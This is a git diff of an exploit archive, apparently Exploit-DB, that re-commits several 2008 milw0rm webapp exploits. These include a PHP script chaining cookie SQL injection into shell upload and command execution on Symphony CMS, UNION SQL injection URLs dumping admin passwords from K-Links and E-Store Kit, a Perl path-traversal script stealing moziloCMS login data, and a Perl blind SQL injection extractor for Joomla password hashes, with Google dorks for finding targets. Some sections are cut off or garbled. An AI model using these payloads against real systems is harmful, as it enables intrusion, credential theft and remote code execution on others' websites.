-$args = unserialize($_COOKIE[__SYM_COOKIE__]);
-$result = $this->login($args['username'], $args['password'], true, false);
-}
-------------------[/source code]---------------------
-password value from cookie is not properly sanitized so the code above is vulnerable
-to a SQL-injection which leads to admin authorization bypass.
-
-ii) arbitrary file upload in admin panel
-file manager in admin panel allows arbitrary file upload including php scripts. This vuln
-is actual only for non-patched version, nevertheless the SQL-injection above works on
-patched version too
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",10);
-
-$url = $argv[1];
-$cmd = $argv[2];
-
-$url_parts = parse_url($url);
-$host = $url_parts['host'];
-$path = $url_parts['path'];
-if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80;
-
-echo "[~] Uploading shell... ";
-exploit($host,$path,$port) ? print("OK\n") : die("Failed\n");
-
-echo "[~] Executing command... ";
-$res = cmd($host,$path,$port,$cmd);
-if ($res) {
-   printf("OK\n%'-65s\n%s%'-65s\n",'',$res,'');
-}else {
-   die("Failed");
-}
-
-function exploit($host,$path,$port) {
-   $ock = fsockopen(gethostbyname($host),$port);
-   if (!$ock) return false;
-
-   $data = "--------bndry31337\r\n";
-   $data.= "Content-Disposition: form-data; ";
-   $data.= "name=\"file\"; filename=\"s.php\"\r\n";
-   $data.= "Content-Type: text/plain\r\n\r\n";
-   $data.= "\r\n";
-   $data.= "--------bndry31337\r\n";
-
-   $data.= "--------bndry31337\r\n";
-   $data.= "Content-Disposition: form-data; name=\"filter\"\r\n\r\n";
-   $data.= "--------bndry31337\r\n";
-
-   $data.= "--------bndry31337\r\n";
-   $data.= "Content-Disposition: form-data; name=\"destination\"\r\n\r\n";
-   $data.= "workspace/masters/\r\n";
-   $data.= "--------bndry31337\r\n";
-
-   $data.= "--------bndry31337\r\n";
-   $data.= "Content-Disposition: form-data; name=\"action[upload]\"\r\n\r\n";
-   $data.= "Upload\r\n";
-   $data.= "--------bndry31337\r\n";
-
-   $data.= "--------bndry31337\r\n";
-   $data.= "Content-Disposition: form-data; name=\"with-selected\"\r\n\r\n";
-   $data.= "With selected...\r\n";
-   $data.= "--------bndry31337\r\n";
-
-   $packet = "POST {$path}symphony/?page=/publish/filemanager/ HTTP/1.0\r\n";
-   $packet.= "Host: {$host}\r\n";
-   $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n";
-   $packet.= "Cookie: sym_auth=a%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22";
-   $packet.= "admin%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%2231337%27+OR+1%3D1+";
-   $packet.= "+LIMIT+1%2F%2A%22%3Bs%3A2%3A%22id%22%3Bi%3A1%3B%7D\r\n";
-   $packet.= "Content-Type: multipart/form-data; boundary=------bndry31337\r\n";
-   $packet.= "Content-Length: ".strlen($data)."\r\n";
-   $packet.= "Connection: close\r\n\r\n";
-
-   $packet.= $data;
-
-   fputs($ock, $packet);
-   $html='';
-   while (!feof($ock)) $html.=fgets($ock);
-
-   return preg_match('@Location: .+?upload-success@',$html) ? true : false;
-}
-
-function cmd($host,$path,$port,$cmd) {
-   $ock = fsockopen(gethostbyname($host),$port);
-   if (!$ock) return false;
-     $data   = "c=".urlencode($cmd);
-     $packet = "POST {$path}workspace/masters/s.php HTTP/1.0\r\n";
-   $packet.= "Host: {$host}\r\n";
-   $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n";
-   $packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
-   $packet.= "Content-Length: ".strlen($data)."\r\n";
-   $packet.= "Connection: close\r\n\r\n";
-     $packet.= $data."\r\n";
-     fputs($ock, $packet);
-   $html='';
-   while (!feof($ock)) $html.=fgets($ock);
-     list($headers,$res)=explode("\r\n\r\n",$html);
-   return strlen($res) ? $res : false;
-}
-
-?>
-
-# milw0rm.com [2008-07-31]
+_db->fetchRow(0, $sql);
+[...]
+}
+[...]
+if(isset($_COOKIE[__SYM_COOKIE__])){
+$args = unserialize($_COOKIE[__SYM_COOKIE__]);
+$result = $this->login($args['username'], $args['password'], true, false);
+}
+------------------[/source code]---------------------
+password value from cookie is not properly sanitized so the code above is vulnerable
+to a SQL-injection which leads to admin authorization bypass.
+
+ii) arbitrary file upload in admin panel
+file manager in admin panel allows arbitrary file upload including php scripts. This vuln
+is actual only for non-patched version, nevertheless the SQL-injection above works on
+patched version too
+*/
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",10);
+
+$url = $argv[1];
+$cmd = $argv[2];
+
+$url_parts = parse_url($url);
+$host = $url_parts['host'];
+$path = $url_parts['path'];
+if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80;
+
+echo "[~] Uploading shell... ";
+exploit($host,$path,$port) ? print("OK\n") : die("Failed\n");
+
+echo "[~] Executing command... ";
+$res = cmd($host,$path,$port,$cmd);
+if ($res) {
+   printf("OK\n%'-65s\n%s%'-65s\n",'',$res,'');
+}else {
+   die("Failed");
+}
+
+function exploit($host,$path,$port) {
+   $ock = fsockopen(gethostbyname($host),$port);
+   if (!$ock) return false;
+
+   $data = "--------bndry31337\r\n";
+   $data.= "Content-Disposition: form-data; ";
+   $data.= "name=\"file\"; filename=\"s.php\"\r\n";
+   $data.= "Content-Type: text/plain\r\n\r\n";
+   $data.= "\r\n";
+   $data.= "--------bndry31337\r\n";
+
+   $data.= "--------bndry31337\r\n";
+   $data.= "Content-Disposition: form-data; name=\"filter\"\r\n\r\n";
+   $data.= "--------bndry31337\r\n";
+
+   $data.= "--------bndry31337\r\n";
+   $data.= "Content-Disposition: form-data; name=\"destination\"\r\n\r\n";
+   $data.= "workspace/masters/\r\n";
+   $data.= "--------bndry31337\r\n";
+
+   $data.= "--------bndry31337\r\n";
+   $data.= "Content-Disposition: form-data; name=\"action[upload]\"\r\n\r\n";
+   $data.= "Upload\r\n";
+   $data.= "--------bndry31337\r\n";
+
+   $data.= "--------bndry31337\r\n";
+   $data.= "Content-Disposition: form-data; name=\"with-selected\"\r\n\r\n";
+   $data.= "With selected...\r\n";
+   $data.= "--------bndry31337\r\n";
+
+   $packet = "POST {$path}symphony/?page=/publish/filemanager/ HTTP/1.0\r\n";
+   $packet.= "Host: {$host}\r\n";
+   $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n";
+   $packet.= "Cookie: sym_auth=a%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22";
+   $packet.= "admin%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%2231337%27+OR+1%3D1+";
+   $packet.= "+LIMIT+1%2F%2A%22%3Bs%3A2%3A%22id%22%3Bi%3A1%3B%7D\r\n";
+   $packet.= "Content-Type: multipart/form-data; boundary=------bndry31337\r\n";
+   $packet.= "Content-Length: ".strlen($data)."\r\n";
+   $packet.= "Connection: close\r\n\r\n";
+
+   $packet.= $data;
+
+   fputs($ock, $packet);
+   $html='';
+   while (!feof($ock)) $html.=fgets($ock);
+
+   return preg_match('@Location: .+?upload-success@',$html) ? true : false;
+}
+
+function cmd($host,$path,$port,$cmd) {
+   $ock = fsockopen(gethostbyname($host),$port);
+   if (!$ock) return false;
+     $data   = "c=".urlencode($cmd);
+     $packet = "POST {$path}workspace/masters/s.php HTTP/1.0\r\n";
+   $packet.= "Host: {$host}\r\n";
+   $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n";
+   $packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
+   $packet.= "Content-Length: ".strlen($data)."\r\n";
+   $packet.= "Connection: close\r\n\r\n";
+     $packet.= $data."\r\n";
+     fputs($ock, $packet);
+   $html='';
+   while (!feof($ock)) $html.=fgets($ock);
+     list($headers,$res)=explode("\r\n\r\n",$html);
+   return strlen($res) ? $res : false;
+}
+
+?>
+
+# milw0rm.com [2008-07-31]
diff --git a/platforms/php/webapps/6178.php b/platforms/php/webapps/6178.php
index b32eb2269..be0dc5c40 100755
--- a/platforms/php/webapps/6178.php
+++ b/platforms/php/webapps/6178.php
@@ -1,252 +1,252 @@
-authenticate();
-	
-	[...]
-	
-	301.	// Process language selection if present in URI or in user profile or try
-	302.	// autodetection if default charset is utf-8
-	303.	if (!empty($_GET['lang']))
-	304.	{
-	305.	        $USER['lang'] = ereg("^[a-z0-9_-]*$", $_GET['lang']) ? $_GET['lang'] : $CONFIG['lang'];
-	306.	}
-	307.	
-	308.	if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
-	309.	{
-	310.	        $CONFIG['default_lang'] = $CONFIG['lang'];          // Save default language
-	311.	        $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
-	312.	}
-	313.	elseif ($CONFIG['charset'] == 'utf-8') <====== [2]
-	314.	{
-	315.	        include('include/select_lang.inc.php');
-	316.	        if (file_exists('lang/' . $USER['lang'] . '.php'))
-	317.	        {
-	318.	                $CONFIG['default_lang'] = $CONFIG['lang'];      // Save default language
-	319.	                $CONFIG['lang'] = $USER['lang'];
-	320.	        }
-	321.	}
-	322.	else
-	323.	{
-	324.	        unset($USER['lang']);
-	325.	}
-	326.	
-	327.	if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))
-	328.	{
-	329.	                unset($CONFIG['default_lang']);
-	330.	}
-	331.	
-	332.	if (!file_exists("lang/{$CONFIG['lang']}.php"))
-	333.	  $CONFIG['lang'] = 'english';
-	334.	
-	335.	// We load the chosen language file
-	336.	require "lang/{$CONFIG['lang']}.php"; <======== [3]
-
-	if $CONFIG['charset'] is set to 'utf-8' [2] (this is the default configuration), an attacker could be able to
-	include an arbitrary local file through the require() at line 336 [3], due to $USER array can be manipulate by
-	cookies (see user_get_profile() function [1] defined into /include/functions.inc.php, near lines 128-146)
-	
-	[-] Path disclosure in /themes/sample/theme.php
-	
-	[-] Possible bug fix in /include/functions.inc.php
-	
-	128.	function user_get_profile()
-	129.	{
-	130.	        global $CONFIG, $USER;
-	131.			
-	132.		if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) {
-	133.			$USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data']));
-	134.			$USER['lang'] = ereg("^[a-z0-9_-]*$", $USER['lang']) ? $USER['lang'] : $CONFIG['lang'];
-	135.	       	}
-	
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-define(STDIN, fopen("php://stdin", "r"));
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-function get_info()
-{
-	global $host, $path, $cookie, $version, $path_disc;
-	
-	$packet  = "GET {$path} HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
-	$packet .= "Connection: close\r\n\r\n";
-	$html	 = http_send($host, $packet);
-	
-	preg_match("/Set-Cookie: (.*)_data/", $html, $match);
-	$cookie = $match[1];
-	
-	preg_match("/                                                                              #
-#
    
-#                                               #
-#                                            #
-#                                      #
-#                                                                #
-#
                                                                                #
-#                                                                            #
-#Your shell save in http://Site/imagebank/                                          #
-#                                                                                   #
-#####################################################################################
-#                           Site : Http://IRCRASH.COM                               #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2008-08-02]
+#####################################################################################
+####              eVision 2.0 Sql Injection/Remote File Upload/IG                ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
+#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
+#####################################################################################
+#                                                                                   #
+#Script Download : http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz
+#                                                                                   #
+#DORK :  :(                                                                           #
+#                                                                                   #
+#####################################################################################
+#                                [Sql Injection]                                    #
+#                                                                                   #
+#Blind : http://Site/print.php?id=1'+and+1=1/*                                      #
+#http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/*
+#User : http://Site/iframe.php?field=username&module=users/*                        #
+#Pass : http://Site/iframe.php?field=pass&module=users/*                            #
+#                                     [IG]                                          #
+#http://Site/admin/phpinfo.php                                                      #
+#                                                                                   #
+#                               [Remote File Upload]                                #
+#Exploit :                                                                          #
+#                                                                                   #
+#                                                                             #
+#                                                                              #
+#
    
+#                                               #
+#                                            #
+#                                      #
+#                                                                #
+#
                                                                                #
+#                                                                            #
+#Your shell save in http://Site/imagebank/                                          #
+#                                                                                   #
+#####################################################################################
+#                           Site : Http://IRCRASH.COM                               #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2008-08-02]
diff --git a/platforms/php/webapps/6192.txt b/platforms/php/webapps/6192.txt
index 9d3caae63..d1178423e 100755
--- a/platforms/php/webapps/6192.txt
+++ b/platforms/php/webapps/6192.txt
@@ -1,51 +1,51 @@
-================================================================================
-|| K-Links Directory SQL-INJECTION, XSS                          
-================================================================================
-
-Application: K-Links Directory
-------------
-
-Website: http://turn-k.net/k-links
---------
-
-Version: Platinum (All)
---------
-
-About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.
-------
-
-Googledork: Powered By K-Links Directory
------------
-
-Demo: http://klinksdemo.com
------
-
-[ SQL-INJECTION ]
-
-http://host/report/-1[SQL]
-http://host/visit.php?id=-1[SQL]
-http://host/addreview/-1[SQL]
-http://host/refer/-1[SQL]
-
-===>>> Exploit:
-
-http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/*
-
-
-/* Admin Login -  http://host/admin 
-
-Manage Templates => web-shell */
-
-
-[ PASSIVE XSS  :)  ]
-
-http://host/index.php?req=login&redirect=&login_message=
-
-
-Author: Corwin
--------                                     
-	
-Contact: corwin88[dog]mail[dot]ru
---------
-
-# milw0rm.com [2008-08-02]
+================================================================================
+|| K-Links Directory SQL-INJECTION, XSS                          
+================================================================================
+
+Application: K-Links Directory
+------------
+
+Website: http://turn-k.net/k-links
+--------
+
+Version: Platinum (All)
+--------
+
+About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.
+------
+
+Googledork: Powered By K-Links Directory
+-----------
+
+Demo: http://klinksdemo.com
+-----
+
+[ SQL-INJECTION ]
+
+http://host/report/-1[SQL]
+http://host/visit.php?id=-1[SQL]
+http://host/addreview/-1[SQL]
+http://host/refer/-1[SQL]
+
+===>>> Exploit:
+
+http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/*
+
+
+/* Admin Login -  http://host/admin 
+
+Manage Templates => web-shell */
+
+
+[ PASSIVE XSS  :)  ]
+
+http://host/index.php?req=login&redirect=&login_message=
+
+
+Author: Corwin
+-------                                     
+	
+Contact: corwin88[dog]mail[dot]ru
+--------
+
+# milw0rm.com [2008-08-02]
diff --git a/platforms/php/webapps/6193.txt b/platforms/php/webapps/6193.txt
index 78cd89748..6940b7e42 100755
--- a/platforms/php/webapps/6193.txt
+++ b/platforms/php/webapps/6193.txt
@@ -1,45 +1,45 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL Injection Vulnerability
-##
-## E-Store Kit-1                    ( viewdetails.php pid )
-## E-Store Kit-2                    ( viewdetails.php pid )
-## E-Store Kit-1 Pro PayPal Edition ( viewdetails.php pid )
-## E-Store Kit-2 PayPal Edition     ( viewdetails.php pid )
-##
-## www.magicscripts.com
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ReaL-HaCk.NeT
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploites :]]-
-##
-## E-Store Kit-1                    www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
-## E-Store Kit-2                    www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
-## E-Store Kit-1 Pro PayPal Edition www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,AdminPassword,0,0,0,0,0,0,0,0+FROM+mp2settings--
-## E-Store Kit-2 PayPal Edition     www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
-##
-########################
-########################
---[[ NOTE ]]--
-In admin panel none username only admin password ;D
- 
-#########################################################################################################
-#########################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
-:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
-#########################################################################################################
-#########################################################################################################
-
-# milw0rm.com [2008-08-02]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL Injection Vulnerability
+##
+## E-Store Kit-1                    ( viewdetails.php pid )
+## E-Store Kit-2                    ( viewdetails.php pid )
+## E-Store Kit-1 Pro PayPal Edition ( viewdetails.php pid )
+## E-Store Kit-2 PayPal Edition     ( viewdetails.php pid )
+##
+## www.magicscripts.com
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ReaL-HaCk.NeT
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploites :]]-
+##
+## E-Store Kit-1                    www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
+## E-Store Kit-2                    www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
+## E-Store Kit-1 Pro PayPal Edition www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,AdminPassword,0,0,0,0,0,0,0,0+FROM+mp2settings--
+## E-Store Kit-2 PayPal Edition     www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
+##
+########################
+########################
+--[[ NOTE ]]--
+In admin panel none username only admin password ;D
+ 
+#########################################################################################################
+#########################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
+#########################################################################################################
+#########################################################################################################
+
+# milw0rm.com [2008-08-02]
diff --git a/platforms/php/webapps/6194.pl b/platforms/php/webapps/6194.pl
index 13c7b2956..6bb230786 100755
--- a/platforms/php/webapps/6194.pl
+++ b/platforms/php/webapps/6194.pl
@@ -1,107 +1,107 @@
-#!/usr/bin/perl
-#
-# moziloCMS 1.10.1 Perl exploit
-#
-# discovered & written by Ams
-# ax330d [doggy] gmail [dot] com
-#
-# DESCRIPTION:
-# Vulnerability hides in "download.php", which we can use to download any file we want to.
-# Here, for example, "admin/conf/logindata.conf". (Btw, not very smart solution to keep it open
-# not looking on that it is protected by .htaccess)
-# Script does not filters global params, it only checks whether local file exists...
-# (By the way, all downloads are logged to "/conf/downloads.conf")
-#
-# USAGE:
-# Run exploit :perl expl.pl http://www.site.com
-#
-# NEEDED:
-# magic_quotes_gpc = off
-#
-
-use strict;
-use IO::Socket;
-
-print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-	\n\t\t moziloCMS 1.10.1 exploit (by Ams)
-	\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";
-
-if(@ARGV<1){
-	die "\n\tUsage:\texpl.pl [host]\n\n
-	\n\tExample:\texpl.pl http://localhost/blog/\n\n";
-}
-
-my $expl_url = $ARGV[0];
-
-print "\n\t[~] Starting exploit...\n";
-
-if($expl_url =~ m#http://#) {
-	exploit($expl_url);
-} else {
-	exploit('http://'.$expl_url);
-}
-
-sub exploit {
-	
-	#	Defining vars.
-	my $site = pop @_;
-	my ($a, $b, $c, @d) = split /\//,$site;
-	my $path = join('/',@d);
-	my $host = $c;
-	if($path) {$path = '/'.$path;}
-	my ($length, $packet, $downloaded, $injection);
-	
-	#	Revealing /data/sess.php.
-	print "\n\t[~] Sending request to 'downloads.php'...\n";
-	$injection = "file=hola&cat=../admin/conf/logindata.conf%00";
-	$length = length($injection);
-	$packet = "POST $path/download.php HTTP/1.1\r\n";
-	$packet .= "Host: $host\r\n";
-	$packet .= "Connection: Close\r\n";
-	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-	$packet .= "Content-Length: $length\r\n\r\n";
-	$packet .= "$injection";
-	$downloaded = send_surprise($host, $packet, 1);
-	
-	if($downloaded =~ /hackin/) {
-		print "\n\t[-] Exploiting failed...\n";
-	} elsif ($downloaded =~ /200 OK/) {
-		#	Parsing and saving received data.
-		$downloaded =~ /\r\n\r\n/ ;
-		$downloaded = $';
-		
-		open(DOWNL, ">hola.txt");
-		print DOWNL $downloaded;
-		close(DOWNL);
-		print "\n\t[+] Looks like ok! Check hola.txt\n";
-	} else {
-		print "\n\t[-] Exploiting failed...\n";
-	}
-}
-
-sub send_surprise() {
-		
-	my $dat = 1;
-	my ($host, $packet, $ret) = @_;
-	my $socket=IO::Socket::INET->new(
-		Proto=>"tcp",
-		PeerAddr=>$host,
-		PeerPort=>"80"
-	);
-	if( ! $socket) {
-		return 0;
-	} else {
-		
-		print $socket $packet;
-		if($ret) {
-			my $rcv;
-			while($rcv = <$socket>) {
-			$dat .= $rcv;
-			}
-		}
-		close ($socket);
-		return $dat;
-	}
-}
-
-# milw0rm.com [2008-08-02]
+#!/usr/bin/perl
+#
+# moziloCMS 1.10.1 Perl exploit
+#
+# discovered & written by Ams
+# ax330d [doggy] gmail [dot] com
+#
+# DESCRIPTION:
+# Vulnerability hides in "download.php", which we can use to download any file we want to.
+# Here, for example, "admin/conf/logindata.conf". (Btw, not very smart solution to keep it open
+# not looking on that it is protected by .htaccess)
+# Script does not filters global params, it only checks whether local file exists...
+# (By the way, all downloads are logged to "/conf/downloads.conf")
+#
+# USAGE:
+# Run exploit :perl expl.pl http://www.site.com
+#
+# NEEDED:
+# magic_quotes_gpc = off
+#
+
+use strict;
+use IO::Socket;
+
+print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+	\n\t\t moziloCMS 1.10.1 exploit (by Ams)
+	\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";
+
+if(@ARGV<1){
+	die "\n\tUsage:\texpl.pl [host]\n\n
+	\n\tExample:\texpl.pl http://localhost/blog/\n\n";
+}
+
+my $expl_url = $ARGV[0];
+
+print "\n\t[~] Starting exploit...\n";
+
+if($expl_url =~ m#http://#) {
+	exploit($expl_url);
+} else {
+	exploit('http://'.$expl_url);
+}
+
+sub exploit {
+	
+	#	Defining vars.
+	my $site = pop @_;
+	my ($a, $b, $c, @d) = split /\//,$site;
+	my $path = join('/',@d);
+	my $host = $c;
+	if($path) {$path = '/'.$path;}
+	my ($length, $packet, $downloaded, $injection);
+	
+	#	Revealing /data/sess.php.
+	print "\n\t[~] Sending request to 'downloads.php'...\n";
+	$injection = "file=hola&cat=../admin/conf/logindata.conf%00";
+	$length = length($injection);
+	$packet = "POST $path/download.php HTTP/1.1\r\n";
+	$packet .= "Host: $host\r\n";
+	$packet .= "Connection: Close\r\n";
+	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+	$packet .= "Content-Length: $length\r\n\r\n";
+	$packet .= "$injection";
+	$downloaded = send_surprise($host, $packet, 1);
+	
+	if($downloaded =~ /hackin/) {
+		print "\n\t[-] Exploiting failed...\n";
+	} elsif ($downloaded =~ /200 OK/) {
+		#	Parsing and saving received data.
+		$downloaded =~ /\r\n\r\n/ ;
+		$downloaded = $';
+		
+		open(DOWNL, ">hola.txt");
+		print DOWNL $downloaded;
+		close(DOWNL);
+		print "\n\t[+] Looks like ok! Check hola.txt\n";
+	} else {
+		print "\n\t[-] Exploiting failed...\n";
+	}
+}
+
+sub send_surprise() {
+		
+	my $dat = 1;
+	my ($host, $packet, $ret) = @_;
+	my $socket=IO::Socket::INET->new(
+		Proto=>"tcp",
+		PeerAddr=>$host,
+		PeerPort=>"80"
+	);
+	if( ! $socket) {
+		return 0;
+	} else {
+		
+		print $socket $packet;
+		if($ret) {
+			my $rcv;
+			while($rcv = <$socket>) {
+			$dat .= $rcv;
+			}
+		}
+		close ($socket);
+		return $dat;
+	}
+}
+
+# milw0rm.com [2008-08-02]
diff --git a/platforms/php/webapps/6199.pl b/platforms/php/webapps/6199.pl
index 8006ec100..c0a1b5d52 100755
--- a/platforms/php/webapps/6199.pl
+++ b/platforms/php/webapps/6199.pl
@@ -1,113 +1,113 @@
-#!/usr/bin/perl
-#Note:Sometimes you have to change the regexp to  viewcategory/catid,".$cid."
-use LWP::UserAgent;
-use Getopt::Long;
-
-if(!$ARGV[1])
-{
-  print "                                                                  \n";
-    print "   ################################################################\n";
-  print "   #   Joomla Component EZ Store Blind SQL Injection Exploit      #\n";
-  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                            #\n";
-  print "   #                                                              #\n";
-  print "   #   Conctact: His0k4.hlm[at]gamil.com                          #\n";
-  print "   #   Greetz:   All friends & muslims HacKeRs                    #\n";
-  print "   #   Greetz2:  http://www.dz-secure.com                         #\n";
-  print "   #                                                              #\n";
-  print "   #   Dork:    inurl:com_ezstore                                 #\n";
-  print "   #   Usage:   perl ezstore.pl host path                #\n";
-  print "   #   Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2  #\n";
-  print "   #                                                              #\n";
-  print "   #   Options:                                                   #\n";
-  print "   #     -t    Valid  procuct id                                  #\n";
-  print "   #     -c    Category value of the following  product id        #\n";
-  print "   ################################################################\n";
-
-  exit;
-}
-
-my $host    = $ARGV[0];
-my $path    = $ARGV[1];
-my $cid     = $ARGV[2];
-my $pid     = $ARGV[3];
-
-my %options = ();
-GetOptions(\%options, "c=i", "x=s", "p=i");
-
-print "[~] Exploiting...\n";
-
-if($options{"c"})
-{
-  $cid = $options{"c"};
-}
-
-if($options{"p"})
-{
-  $pid = $options{"p"};
-}
-
-syswrite(STDOUT, "[~] MD5-Hash: ", 14);
-
-for(my $i = 1; $i <= 32; $i++)
-{
-  my $f = 0;
-  my $h = 48;
-  while(!$f && $h <= 57)
-  {
-    if(istrue2($host, $path, $cid, $pid, $i, $h))
-    {
-      $f = 1;
-      syswrite(STDOUT, chr($h), 1);
-    }
-    $h++;
-  }
-  if(!$f)
-  {
-    $h = 97;
-    while(!$f && $h <= 122)
-    {
-      if(istrue2($host, $path, $cid, $pid, $i, $h))
-      {
-        $f = 1;
-        syswrite(STDOUT, chr($h), 1);
-      }
-      $h++;
-    }
-  }
-}
-
-print "\n[~] Exploiting done\n";
-
-sub istrue2
-{
-  my $host  = shift;
-  my $path  = shift;
-  my $cid   = shift;
-  my $pid   = shift;
-  my $i     = shift;
-  my $h     = shift;
- 
-  my $ua = LWP::UserAgent->new;
-  my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
- 
-  if($options{"x"})
-  {
-    $ua->proxy('http', "http://".$options{"x"});
-  }
- 
-  my $resp = $ua->get($query);
-  my $content = $resp->content;
-  my $regexp = "viewcategory&catid=".$cid."";
- 
-  if($content =~ /$regexp/)
-  {
-    return 1;
-  }
-  else
-  {
-    return 0;
-  }
-
-}
-
-# milw0rm.com [2008-08-03]
+#!/usr/bin/perl
+#Note:Sometimes you have to change the regexp to  viewcategory/catid,".$cid."
+use LWP::UserAgent;
+use Getopt::Long;
+
+if(!$ARGV[1])
+{
+  print "                                                                  \n";
+    print "   ################################################################\n";
+  print "   #   Joomla Component EZ Store Blind SQL Injection Exploit      #\n";
+  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                            #\n";
+  print "   #                                                              #\n";
+  print "   #   Conctact: His0k4.hlm[at]gamil.com                          #\n";
+  print "   #   Greetz:   All friends & muslims HacKeRs                    #\n";
+  print "   #   Greetz2:  http://www.dz-secure.com                         #\n";
+  print "   #                                                              #\n";
+  print "   #   Dork:    inurl:com_ezstore                                 #\n";
+  print "   #   Usage:   perl ezstore.pl host path                #\n";
+  print "   #   Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2  #\n";
+  print "   #                                                              #\n";
+  print "   #   Options:                                                   #\n";
+  print "   #     -t    Valid  procuct id                                  #\n";
+  print "   #     -c    Category value of the following  product id        #\n";
+  print "   ################################################################\n";
+
